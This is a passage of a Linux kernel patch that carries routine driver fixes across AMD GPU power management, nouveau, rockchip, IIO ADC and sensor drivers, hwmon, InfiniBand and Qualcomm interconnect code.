+ 
++	INIT_DELAYED_WORK(&smu->swctf_delayed_work,
++			  smu_swctf_delayed_work_handler);
++
+ 	ret = smu_smc_table_sw_init(smu);
+ 	if (ret) {
+ 		dev_err(adev->dev, "Failed to sw init smc table!\n");
+@@ -1581,6 +1613,8 @@ static int smu_smc_hw_cleanup(struct smu_context *smu)
+ 		return ret;
+ 	}
+ 
++	cancel_delayed_work_sync(&smu->swctf_delayed_work);
++
+ 	ret = smu_disable_dpms(smu);
+ 	if (ret) {
+ 		dev_err(adev->dev, "Fail to disable dpm features!\n");
+@@ -2520,6 +2554,14 @@ static int smu_read_sensor(void *handle,
+ 		*((uint32_t *)data) = pstate_table->uclk_pstate.standard * 100;
+ 		*size = 4;
+ 		break;
++	case AMDGPU_PP_SENSOR_PEAK_PSTATE_SCLK:
++		*((uint32_t *)data) = pstate_table->gfxclk_pstate.peak * 100;
++		*size = 4;
++		break;
++	case AMDGPU_PP_SENSOR_PEAK_PSTATE_MCLK:
++		*((uint32_t *)data) = pstate_table->uclk_pstate.peak * 100;
++		*size = 4;
++		break;
+ 	case AMDGPU_PP_SENSOR_ENABLED_SMC_FEATURES_MASK:
+ 		ret = smu_feature_get_enabled_mask(smu, (uint64_t *)data);
+ 		*size = 8;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+index 3bc4128a22ac2..1ab77a6cdb653 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+@@ -573,6 +573,8 @@ struct smu_context
+ 	u32 debug_param_reg;
+ 	u32 debug_msg_reg;
+ 	u32 debug_resp_reg;
++
++	struct delayed_work		swctf_delayed_work;
+ };
+ 
+ struct i2c_adapter;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
+index ad5f6a15a1d7d..d490b571c8ffa 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
+@@ -1438,13 +1438,8 @@ static int smu_v11_0_irq_process(struct amdgpu_device *adev,
+ 	if (client_id == SOC15_IH_CLIENTID_THM) {
+ 		switch (src_id) {
+ 		case THM_11_0__SRCID__THM_DIG_THERM_L2H:
+-			dev_emerg(adev->dev, "ERROR: GPU over temperature range(SW CTF) detected!\n");
+-			/*
+-			 * SW CTF just occurred.
+-			 * Try to do a graceful shutdown to prevent further damage.
+-			 */
+-			dev_emerg(adev->dev, "ERROR: System is going to shutdown due to GPU SW CTF!\n");
+-			orderly_poweroff(true);
++			schedule_delayed_work(&smu->swctf_delayed_work,
++					      msecs_to_jiffies(AMDGPU_SWCTF_EXTRA_DELAY));
+ 		break;
+ 		case THM_11_0__SRCID__THM_DIG_THERM_H2L:
+ 			dev_emerg(adev->dev, "ERROR: GPU under temperature range detected\n");
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 47fafb1fa6088..3104d49379090 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -1386,13 +1386,8 @@ static int smu_v13_0_irq_process(struct amdgpu_device *adev,
+ 	if (client_id == SOC15_IH_CLIENTID_THM) {
+ 		switch (src_id) {
+ 		case THM_11_0__SRCID__THM_DIG_THERM_L2H:
+-			dev_emerg(adev->dev, "ERROR: GPU over temperature range(SW CTF) detected!\n");
+-			/*
+-			 * SW CTF just occurred.
+-			 * Try to do a graceful shutdown to prevent further damage.
+-			 */
+-			dev_emerg(adev->dev, "ERROR: System is going to shutdown due to GPU SW CTF!\n");
+-			orderly_poweroff(true);
++			schedule_delayed_work(&smu->swctf_delayed_work,
++					      msecs_to_jiffies(AMDGPU_SWCTF_EXTRA_DELAY));
+ 			break;
+ 		case THM_11_0__SRCID__THM_DIG_THERM_H2L:
+ 			dev_emerg(adev->dev, "ERROR: GPU under temperature range detected\n");
+diff --git a/drivers/gpu/drm/drm_gem_shmem_helper.c b/drivers/gpu/drm/drm_gem_shmem_helper.c
+index 5fdc608043e76..e33f06bb66eb4 100644
+--- a/drivers/gpu/drm/drm_gem_shmem_helper.c
++++ b/drivers/gpu/drm/drm_gem_shmem_helper.c
+@@ -622,7 +622,13 @@ int drm_gem_shmem_mmap(struct drm_gem_shmem_object *shmem, struct vm_area_struct
+ 	int ret;
+ 
+ 	if (obj->import_attach) {
++		/* Reset both vm_ops and vm_private_data, so we don't end up with
++		 * vm_ops pointing to our implementation if the dma-buf backend
++		 * doesn't set those fields.
++		 */
+ 		vma->vm_private_data = NULL;
++		vma->vm_ops = NULL;
++
+ 		ret = dma_buf_mmap(obj->dma_buf, vma, 0);
+ 
+ 		/* Drop the reference drm_gem_mmap_obj() acquired.*/
+diff --git a/drivers/gpu/drm/nouveau/nouveau_connector.c b/drivers/gpu/drm/nouveau/nouveau_connector.c
+index f40310559d13f..49c5451cdfb16 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_connector.c
++++ b/drivers/gpu/drm/nouveau/nouveau_connector.c
+@@ -967,7 +967,7 @@ nouveau_connector_get_modes(struct drm_connector *connector)
+ 	/* Determine display colour depth for everything except LVDS now,
+ 	 * DP requires this before mode_valid() is called.
+ 	 */
+-	if (connector->connector_type != DRM_MODE_CONNECTOR_LVDS && nv_connector->native_mode)
++	if (connector->connector_type != DRM_MODE_CONNECTOR_LVDS)
+ 		nouveau_connector_detect_depth(connector);
+ 
+ 	/* Find the native mode if this is a digital panel, if we didn't
+diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/disp/dp.c b/drivers/gpu/drm/nouveau/nvkm/engine/disp/dp.c
+index c1b3206f27e64..458f8efb19c6c 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/engine/disp/dp.c
++++ b/drivers/gpu/drm/nouveau/nvkm/engine/disp/dp.c
+@@ -26,6 +26,8 @@
+ #include "head.h"
+ #include "ior.h"
+ 
++#include <drm/display/drm_dp.h>
++
+ #include <subdev/bios.h>
+ #include <subdev/bios/init.h>
+ #include <subdev/gpio.h>
+@@ -474,6 +476,50 @@ nvkm_dp_train(struct nvkm_outp *outp, u32 dataKBps)
+ 	return ret;
+ }
+ 
++/* XXX: This is a big fat hack, and this is just drm_dp_read_dpcd_caps()
++ * converted to work inside nvkm. This is a temporary holdover until we start
++ * passing the drm_dp_aux device through NVKM
++ */
++static int
++nvkm_dp_read_dpcd_caps(struct nvkm_outp *outp)
++{
++	struct nvkm_i2c_aux *aux = outp->dp.aux;
++	u8 dpcd_ext[DP_RECEIVER_CAP_SIZE];
++	int ret;
++
++	ret = nvkm_rdaux(aux, DPCD_RC00_DPCD_REV, outp->dp.dpcd, DP_RECEIVER_CAP_SIZE);
++	if (ret < 0)
++		return ret;
++
++	/*
++	 * Prior to DP1.3 the bit represented by
++	 * DP_EXTENDED_RECEIVER_CAP_FIELD_PRESENT was reserved.
++	 * If it is set DP_DPCD_REV at 0000h could be at a value less than
++	 * the true capability of the panel. The only way to check is to
++	 * then compare 0000h and 2200h.
++	 */
++	if (!(outp->dp.dpcd[DP_TRAINING_AUX_RD_INTERVAL] &
++	      DP_EXTENDED_RECEIVER_CAP_FIELD_PRESENT))
++		return 0;
++
++	ret = nvkm_rdaux(aux, DP_DP13_DPCD_REV, dpcd_ext, sizeof(dpcd_ext));
++	if (ret < 0)
++		return ret;
++
++	if (outp->dp.dpcd[DP_DPCD_REV] > dpcd_ext[DP_DPCD_REV]) {
++		OUTP_DBG(outp, "Extended DPCD rev less than base DPCD rev (%d > %d)\n",
++			 outp->dp.dpcd[DP_DPCD_REV], dpcd_ext[DP_DPCD_REV]);
++		return 0;
++	}
++
++	if (!memcmp(outp->dp.dpcd, dpcd_ext, sizeof(dpcd_ext)))
++		return 0;
++
++	memcpy(outp->dp.dpcd, dpcd_ext, sizeof(dpcd_ext));
++
++	return 0;
++}
++
+ void
+ nvkm_dp_disable(struct nvkm_outp *outp, struct nvkm_ior *ior)
+ {
+@@ -630,7 +676,7 @@ nvkm_dp_enable(struct nvkm_outp *outp, bool enable)
+ 			memset(outp->dp.lttpr, 0x00, sizeof(outp->dp.lttpr));
+ 		}
+ 
+-		if (!nvkm_rdaux(aux, DPCD_RC00_DPCD_REV, outp->dp.dpcd, sizeof(outp->dp.dpcd))) {
++		if (!nvkm_dp_read_dpcd_caps(outp)) {
+ 			const u8 rates[] = { 0x1e, 0x14, 0x0a, 0x06, 0 };
+ 			const u8 *rate;
+ 			int rate_max;
+diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgf100.h b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgf100.h
+index 32bbddc0993e8..679aff79f4d6b 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgf100.h
++++ b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgf100.h
+@@ -123,6 +123,7 @@ void gk104_grctx_generate_r418800(struct gf100_gr *);
+ 
+ extern const struct gf100_grctx_func gk110_grctx;
+ void gk110_grctx_generate_r419eb0(struct gf100_gr *);
++void gk110_grctx_generate_r419f78(struct gf100_gr *);
+ 
+ extern const struct gf100_grctx_func gk110b_grctx;
+ extern const struct gf100_grctx_func gk208_grctx;
+diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk104.c b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk104.c
+index 304e9d268bad4..f894f82548242 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk104.c
++++ b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk104.c
+@@ -916,7 +916,9 @@ static void
+ gk104_grctx_generate_r419f78(struct gf100_gr *gr)
+ {
+ 	struct nvkm_device *device = gr->base.engine.subdev.device;
+-	nvkm_mask(device, 0x419f78, 0x00000001, 0x00000000);
++
++	/* bit 3 set disables loads in fp helper invocations, we need it enabled */
++	nvkm_mask(device, 0x419f78, 0x00000009, 0x00000000);
+ }
+ 
+ void
+diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110.c b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110.c
+index 86547cfc38dce..e88740d4e54d4 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110.c
++++ b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110.c
+@@ -820,6 +820,15 @@ gk110_grctx_generate_r419eb0(struct gf100_gr *gr)
+ 	nvkm_mask(device, 0x419eb0, 0x00001000, 0x00001000);
+ }
+ 
++void
++gk110_grctx_generate_r419f78(struct gf100_gr *gr)
++{
++	struct nvkm_device *device = gr->base.engine.subdev.device;
++
++	/* bit 3 set disables loads in fp helper invocations, we need it enabled */
++	nvkm_mask(device, 0x419f78, 0x00000008, 0x00000000);
++}
++
+ const struct gf100_grctx_func
+ gk110_grctx = {
+ 	.main  = gf100_grctx_generate_main,
+@@ -852,4 +861,5 @@ gk110_grctx = {
+ 	.gpc_tpc_nr = gk104_grctx_generate_gpc_tpc_nr,
+ 	.r418800 = gk104_grctx_generate_r418800,
+ 	.r419eb0 = gk110_grctx_generate_r419eb0,
++	.r419f78 = gk110_grctx_generate_r419f78,
+ };
+diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110b.c b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110b.c
+index ebb947bd1446b..086e4d49e1121 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110b.c
++++ b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110b.c
+@@ -101,4 +101,5 @@ gk110b_grctx = {
+ 	.gpc_tpc_nr = gk104_grctx_generate_gpc_tpc_nr,
+ 	.r418800 = gk104_grctx_generate_r418800,
+ 	.r419eb0 = gk110_grctx_generate_r419eb0,
++	.r419f78 = gk110_grctx_generate_r419f78,
+ };
+diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk208.c b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk208.c
+index 4d40512b5c998..0bf438c3f7cbc 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk208.c
++++ b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk208.c
+@@ -566,4 +566,5 @@ gk208_grctx = {
+ 	.dist_skip_table = gf117_grctx_generate_dist_skip_table,
+ 	.gpc_tpc_nr = gk104_grctx_generate_gpc_tpc_nr,
+ 	.r418800 = gk104_grctx_generate_r418800,
++	.r419f78 = gk110_grctx_generate_r419f78,
+ };
+diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgm107.c b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgm107.c
+index 0b3964e6b36e2..acdf0932a99e1 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgm107.c
++++ b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgm107.c
+@@ -991,4 +991,5 @@ gm107_grctx = {
+ 	.r406500 = gm107_grctx_generate_r406500,
+ 	.gpc_tpc_nr = gk104_grctx_generate_gpc_tpc_nr,
+ 	.r419e00 = gm107_grctx_generate_r419e00,
++	.r419f78 = gk110_grctx_generate_r419f78,
+ };
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+index 9fea03121247e..2e2e08f4359a8 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+@@ -836,12 +836,12 @@ static int vop_plane_atomic_check(struct drm_plane *plane,
+ 	 * need align with 2 pixel.
+ 	 */
+ 	if (fb->format->is_yuv && ((new_plane_state->src.x1 >> 16) % 2)) {
+-		DRM_ERROR("Invalid Source: Yuv format not support odd xpos\n");
++		DRM_DEBUG_KMS("Invalid Source: Yuv format not support odd xpos\n");
+ 		return -EINVAL;
+ 	}
+ 
+ 	if (fb->format->is_yuv && new_plane_state->rotation & DRM_MODE_REFLECT_Y) {
+-		DRM_ERROR("Invalid Source: Yuv format does not support this rotation\n");
++		DRM_DEBUG_KMS("Invalid Source: Yuv format does not support this rotation\n");
+ 		return -EINVAL;
+ 	}
+ 
+@@ -849,7 +849,7 @@ static int vop_plane_atomic_check(struct drm_plane *plane,
+ 		struct vop *vop = to_vop(crtc);
+ 
+ 		if (!vop->data->afbc) {
+-			DRM_ERROR("vop does not support AFBC\n");
++			DRM_DEBUG_KMS("vop does not support AFBC\n");
+ 			return -EINVAL;
+ 		}
+ 
+@@ -858,15 +858,16 @@ static int vop_plane_atomic_check(struct drm_plane *plane,
+ 			return ret;
+ 
+ 		if (new_plane_state->src.x1 || new_plane_state->src.y1) {
+-			DRM_ERROR("AFBC does not support offset display, xpos=%d, ypos=%d, offset=%d\n",
+-				  new_plane_state->src.x1,
+-				  new_plane_state->src.y1, fb->offsets[0]);
++			DRM_DEBUG_KMS("AFBC does not support offset display, " \
++				      "xpos=%d, ypos=%d, offset=%d\n",
++				      new_plane_state->src.x1, new_plane_state->src.y1,
++				      fb->offsets[0]);
+ 			return -EINVAL;
+ 		}
+ 
+ 		if (new_plane_state->rotation && new_plane_state->rotation != DRM_MODE_ROTATE_0) {
+-			DRM_ERROR("No rotation support in AFBC, rotation=%d\n",
+-				  new_plane_state->rotation);
++			DRM_DEBUG_KMS("No rotation support in AFBC, rotation=%d\n",
++				      new_plane_state->rotation);
+ 			return -EINVAL;
+ 		}
+ 	}
+diff --git a/drivers/hwmon/pmbus/bel-pfe.c b/drivers/hwmon/pmbus/bel-pfe.c
+index 4100eefb7ac32..61c195f8fd3b8 100644
+--- a/drivers/hwmon/pmbus/bel-pfe.c
++++ b/drivers/hwmon/pmbus/bel-pfe.c
+@@ -17,12 +17,13 @@
+ enum chips {pfe1100, pfe3000};
+ 
+ /*
+- * Disable status check for pfe3000 devices, because some devices report
+- * communication error (invalid command) for VOUT_MODE command (0x20)
+- * although correct VOUT_MODE (0x16) is returned: it leads to incorrect
+- * exponent in linear mode.
++ * Disable status check because some devices report communication error
++ * (invalid command) for VOUT_MODE command (0x20) although the correct
++ * VOUT_MODE (0x16) is returned: it leads to incorrect exponent in linear
++ * mode.
++ * This affects both pfe3000 and pfe1100.
+  */
+-static struct pmbus_platform_data pfe3000_plat_data = {
++static struct pmbus_platform_data pfe_plat_data = {
+ 	.flags = PMBUS_SKIP_STATUS_CHECK,
+ };
+ 
+@@ -94,16 +95,15 @@ static int pfe_pmbus_probe(struct i2c_client *client)
+ 	int model;
+ 
+ 	model = (int)i2c_match_id(pfe_device_id, client)->driver_data;
++	client->dev.platform_data = &pfe_plat_data;
+ 
+ 	/*
+ 	 * PFE3000-12-069RA devices may not stay in page 0 during device
+ 	 * probe which leads to probe failure (read status word failed).
+ 	 * So let's set the device to page 0 at the beginning.
+ 	 */
+-	if (model == pfe3000) {
+-		client->dev.platform_data = &pfe3000_plat_data;
++	if (model == pfe3000)
+ 		i2c_smbus_write_byte_data(client, PMBUS_PAGE, 0);
+-	}
+ 
+ 	return pmbus_do_probe(client, &pfe_driver_info[model]);
+ }
+diff --git a/drivers/iio/adc/ad7192.c b/drivers/iio/adc/ad7192.c
+index 8720ac43a4a4a..80eff7090f14a 100644
+--- a/drivers/iio/adc/ad7192.c
++++ b/drivers/iio/adc/ad7192.c
+@@ -62,7 +62,6 @@
+ #define AD7192_MODE_STA_MASK	BIT(20) /* Status Register transmission Mask */
+ #define AD7192_MODE_CLKSRC(x)	(((x) & 0x3) << 18) /* Clock Source Select */
+ #define AD7192_MODE_SINC3	BIT(15) /* SINC3 Filter Select */
+-#define AD7192_MODE_ACX		BIT(14) /* AC excitation enable(AD7195 only)*/
+ #define AD7192_MODE_ENPAR	BIT(13) /* Parity Enable */
+ #define AD7192_MODE_CLKDIV	BIT(12) /* Clock divide by 2 (AD7190/2 only)*/
+ #define AD7192_MODE_SCYCLE	BIT(11) /* Single cycle conversion */
+@@ -91,6 +90,7 @@
+ /* Configuration Register Bit Designations (AD7192_REG_CONF) */
+ 
+ #define AD7192_CONF_CHOP	BIT(23) /* CHOP enable */
++#define AD7192_CONF_ACX		BIT(22) /* AC excitation enable(AD7195 only) */
+ #define AD7192_CONF_REFSEL	BIT(20) /* REFIN1/REFIN2 Reference Select */
+ #define AD7192_CONF_CHAN(x)	((x) << 8) /* Channel select */
+ #define AD7192_CONF_CHAN_MASK	(0x7FF << 8) /* Channel select mask */
+@@ -473,7 +473,7 @@ static ssize_t ad7192_show_ac_excitation(struct device *dev,
+ 	struct iio_dev *indio_dev = dev_to_iio_dev(dev);
+ 	struct ad7192_state *st = iio_priv(indio_dev);
+ 
+-	return sysfs_emit(buf, "%d\n", !!(st->mode & AD7192_MODE_ACX));
++	return sysfs_emit(buf, "%d\n", !!(st->conf & AD7192_CONF_ACX));
+ }
+ 
+ static ssize_t ad7192_show_bridge_switch(struct device *dev,
+@@ -514,13 +514,13 @@ static ssize_t ad7192_set(struct device *dev,
+ 
+ 		ad_sd_write_reg(&st->sd, AD7192_REG_GPOCON, 1, st->gpocon);
+ 		break;
+-	case AD7192_REG_MODE:
++	case AD7192_REG_CONF:
+ 		if (val)
+-			st->mode |= AD7192_MODE_ACX;
++			st->conf |= AD7192_CONF_ACX;
+ 		else
+-			st->mode &= ~AD7192_MODE_ACX;
++			st->conf &= ~AD7192_CONF_ACX;
+ 
+-		ad_sd_write_reg(&st->sd, AD7192_REG_MODE, 3, st->mode);
++		ad_sd_write_reg(&st->sd, AD7192_REG_CONF, 3, st->conf);
+ 		break;
+ 	default:
+ 		ret = -EINVAL;
+@@ -580,12 +580,11 @@ static IIO_DEVICE_ATTR(bridge_switch_en, 0644,
+ 
+ static IIO_DEVICE_ATTR(ac_excitation_en, 0644,
+ 		       ad7192_show_ac_excitation, ad7192_set,
+-		       AD7192_REG_MODE);
++		       AD7192_REG_CONF);
+ 
+ static struct attribute *ad7192_attributes[] = {
+ 	&iio_dev_attr_filter_low_pass_3db_frequency_available.dev_attr.attr,
+ 	&iio_dev_attr_bridge_switch_en.dev_attr.attr,
+-	&iio_dev_attr_ac_excitation_en.dev_attr.attr,
+ 	NULL
+ };
+ 
+@@ -596,6 +595,7 @@ static const struct attribute_group ad7192_attribute_group = {
+ static struct attribute *ad7195_attributes[] = {
+ 	&iio_dev_attr_filter_low_pass_3db_frequency_available.dev_attr.attr,
+ 	&iio_dev_attr_bridge_switch_en.dev_attr.attr,
++	&iio_dev_attr_ac_excitation_en.dev_attr.attr,
+ 	NULL
+ };
+ 
+diff --git a/drivers/iio/adc/ina2xx-adc.c b/drivers/iio/adc/ina2xx-adc.c
+index 910e7e965fc48..74092f3836b83 100644
+--- a/drivers/iio/adc/ina2xx-adc.c
++++ b/drivers/iio/adc/ina2xx-adc.c
+@@ -124,6 +124,7 @@ static const struct regmap_config ina2xx_regmap_config = {
+ enum ina2xx_ids { ina219, ina226 };
+ 
+ struct ina2xx_config {
++	const char *name;
+ 	u16 config_default;
+ 	int calibration_value;
+ 	int shunt_voltage_lsb;	/* nV */
+@@ -155,6 +156,7 @@ struct ina2xx_chip_info {
+ 
+ static const struct ina2xx_config ina2xx_config[] = {
+ 	[ina219] = {
++		.name = "ina219",
+ 		.config_default = INA219_CONFIG_DEFAULT,
+ 		.calibration_value = 4096,
+ 		.shunt_voltage_lsb = 10000,
+@@ -164,6 +166,7 @@ static const struct ina2xx_config ina2xx_config[] = {
+ 		.chip_id = ina219,
+ 	},
+ 	[ina226] = {
++		.name = "ina226",
+ 		.config_default = INA226_CONFIG_DEFAULT,
+ 		.calibration_value = 2048,
+ 		.shunt_voltage_lsb = 2500,
+@@ -996,7 +999,7 @@ static int ina2xx_probe(struct i2c_client *client,
+ 	/* Patch the current config register with default. */
+ 	val = chip->config->config_default;
+ 
+-	if (id->driver_data == ina226) {
++	if (type == ina226) {
+ 		ina226_set_average(chip, INA226_DEFAULT_AVG, &val);
+ 		ina226_set_int_time_vbus(chip, INA226_DEFAULT_IT, &val);
+ 		ina226_set_int_time_vshunt(chip, INA226_DEFAULT_IT, &val);
+@@ -1015,7 +1018,7 @@ static int ina2xx_probe(struct i2c_client *client,
+ 	}
+ 
+ 	indio_dev->modes = INDIO_DIRECT_MODE;
+-	if (id->driver_data == ina226) {
++	if (type == ina226) {
+ 		indio_dev->channels = ina226_channels;
+ 		indio_dev->num_channels = ARRAY_SIZE(ina226_channels);
+ 		indio_dev->info = &ina226_info;
+@@ -1024,7 +1027,7 @@ static int ina2xx_probe(struct i2c_client *client,
+ 		indio_dev->num_channels = ARRAY_SIZE(ina219_channels);
+ 		indio_dev->info = &ina219_info;
+ 	}
+-	indio_dev->name = id->name;
++	indio_dev->name = id ? id->name : chip->config->name;
+ 
+ 	ret = devm_iio_kfifo_buffer_setup(&client->dev, indio_dev,
+ 					  &ina2xx_setup_ops);
+diff --git a/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c b/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c
+index 05a28d353e343..d98f7e4d202c1 100644
+--- a/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c
++++ b/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c
+@@ -253,7 +253,7 @@ int cros_ec_sensors_core_init(struct platform_device *pdev,
+ 	platform_set_drvdata(pdev, indio_dev);
+ 
+ 	state->ec = ec->ec_dev;
+-	state->msg = devm_kzalloc(&pdev->dev,
++	state->msg = devm_kzalloc(&pdev->dev, sizeof(*state->msg) +
+ 				max((u16)sizeof(struct ec_params_motion_sense),
+ 				state->ec->max_response), GFP_KERNEL);
+ 	if (!state->msg)
+diff --git a/drivers/iio/frequency/admv1013.c b/drivers/iio/frequency/admv1013.c
+index ed81672713586..e6311213f3e89 100644
+--- a/drivers/iio/frequency/admv1013.c
++++ b/drivers/iio/frequency/admv1013.c
+@@ -344,9 +344,12 @@ static int admv1013_update_quad_filters(struct admv1013_state *st)
+ 
+ static int admv1013_update_mixer_vgate(struct admv1013_state *st)
+ {
+-	unsigned int vcm, mixer_vgate;
++	unsigned int mixer_vgate;
++	int vcm;
+ 
+ 	vcm = regulator_get_voltage(st->reg);
++	if (vcm < 0)
++		return vcm;
+ 
+ 	if (vcm < 1800000)
+ 		mixer_vgate = (2389 * vcm / 1000000 + 8100) / 100;
+diff --git a/drivers/iio/industrialio-core.c b/drivers/iio/industrialio-core.c
+index 151ff39933548..f3f8392623a46 100644
+--- a/drivers/iio/industrialio-core.c
++++ b/drivers/iio/industrialio-core.c
+@@ -1916,7 +1916,7 @@ static const struct iio_buffer_setup_ops noop_ring_setup_ops;
+ int __iio_device_register(struct iio_dev *indio_dev, struct module *this_mod)
+ {
+ 	struct iio_dev_opaque *iio_dev_opaque = to_iio_dev_opaque(indio_dev);
+-	struct fwnode_handle *fwnode;
++	struct fwnode_handle *fwnode = NULL;
+ 	int ret;
+ 
+ 	if (!indio_dev->info)
+@@ -1927,7 +1927,8 @@ int __iio_device_register(struct iio_dev *indio_dev, struct module *this_mod)
+ 	/* If the calling driver did not initialize firmware node, do it here */
+ 	if (dev_fwnode(&indio_dev->dev))
+ 		fwnode = dev_fwnode(&indio_dev->dev);
+-	else
++	/* The default dummy IIO device has no parent */
++	else if (indio_dev->dev.parent)
+ 		fwnode = dev_fwnode(indio_dev->dev.parent);
+ 	device_set_node(&indio_dev->dev, fwnode);
+ 
+diff --git a/drivers/infiniband/core/umem.c b/drivers/infiniband/core/umem.c
+index 86d479772fbc6..957634eceba8f 100644
+--- a/drivers/infiniband/core/umem.c
++++ b/drivers/infiniband/core/umem.c
+@@ -85,6 +85,8 @@ unsigned long ib_umem_find_best_pgsz(struct ib_umem *umem,
+ 	dma_addr_t mask;
+ 	int i;
+ 
++	umem->iova = va = virt;
++
+ 	if (umem->is_odp) {
+ 		unsigned int page_size = BIT(to_ib_umem_odp(umem)->page_shift);
+ 
+@@ -100,7 +102,6 @@ unsigned long ib_umem_find_best_pgsz(struct ib_umem *umem,
+ 	 */
+ 	pgsz_bitmap &= GENMASK(BITS_PER_LONG - 1, PAGE_SHIFT);
+ 
+-	umem->iova = va = virt;
+ 	/* The best result is the smallest page size that results in the minimum
+ 	 * number of required pages. Compute the largest page size that could
+ 	 * work based on VA address bits that don't change.
+diff --git a/drivers/infiniband/hw/hfi1/chip.c b/drivers/infiniband/hw/hfi1/chip.c
+index 90b672feed83d..194cac40da653 100644
+--- a/drivers/infiniband/hw/hfi1/chip.c
++++ b/drivers/infiniband/hw/hfi1/chip.c
+@@ -12307,6 +12307,7 @@ static void free_cntrs(struct hfi1_devdata *dd)
+ 
+ 	if (dd->synth_stats_timer.function)
+ 		del_timer_sync(&dd->synth_stats_timer);
++	cancel_work_sync(&dd->update_cntr_work);
+ 	ppd = (struct hfi1_pportdata *)(dd + 1);
+ 	for (i = 0; i < dd->num_pports; i++, ppd++) {
+ 		kfree(ppd->cntrs);
+diff --git a/drivers/interconnect/qcom/bcm-voter.c b/drivers/interconnect/qcom/bcm-voter.c
+index 8f385f9c2dd38..d5f2a6b5376bd 100644
+--- a/drivers/interconnect/qcom/bcm-voter.c
++++ b/drivers/interconnect/qcom/bcm-voter.c
+@@ -83,6 +83,11 @@ static void bcm_aggregate(struct qcom_icc_bcm *bcm)
+ 
+ 		temp = agg_peak[bucket] * bcm->vote_scale;
+ 		bcm->vote_y[bucket] = bcm_div(temp, bcm->aux_data.unit);
++
++		if (bcm->enable_mask && (bcm->vote_x[bucket] || bcm->vote_y[bucket])) {
++			bcm->vote_x[bucket] = 0;
++			bcm->vote_y[bucket] = bcm->enable_mask;
++		}
+ 	}
+ 
+ 	if (bcm->keepalive && bcm->vote_x[QCOM_ICC_BUCKET_AMC] == 0 &&
+diff --git a/drivers/interconnect/qcom/icc-rpmh.h b/drivers/interconnect/qcom/icc-rpmh.h
+index 04391c1ba465c..7843d8864d6ba 100644
+--- a/drivers/interconnect/qcom/icc-rpmh.h
++++ b/drivers/interconnect/qcom/icc-rpmh.h
+@@ -81,6 +81,7 @@ struct qcom_icc_node {
+  * @vote_x: aggregated threshold values, represents sum_bw when @type is bw bcm
+  * @vote_y: aggregated threshold values, represents peak_bw when @type is bw bcm
+  * @vote_scale: scaling factor for vote_x and vote_y
++ * @enable_mask: optional mask to send as vote instead of vote_x/vote_y
+  * @dirty: flag used to indicate whether the bcm needs to be committed
+  * @keepalive: flag used to indicate whether a keepalive is required
+  * @aux_data: auxiliary data used when calculating threshold values and
+@@ -97,6 +98,7 @@ struct qcom_icc_bcm {
+ 	u64 vote_x[QCOM_ICC_NUM_BUCKETS];
+ 	u64 vote_y[QCOM_ICC_NUM_BUCKETS];
+ 	u64 vote_scale;
++	u32 enable_mask;
+ 	bool dirty;
+ 	bool keepalive;
+ 	struct bcm_db aux_data;
+diff --git a/drivers/interconnect/qcom/sm8450.c b/drivers/interconnect/qcom/sm8450.c
+index 2d7a8e7b85ec2..e64c214b40209 100644
+--- a/drivers/interconnect/qcom/sm8450.c
++++ b/drivers/interconnect/qcom/sm8450.c
+@@ -1337,6 +1337,7 @@ static struct qcom_icc_node qns_mem_noc_sf_disp = {
+ 
+ static struct qcom_icc_bcm bcm_acv = {
+ 	.name = "ACV",
++	.enable_mask = 0x8,
+ 	.num_nodes = 1,
+ 	.nodes = { &ebi },
+ };
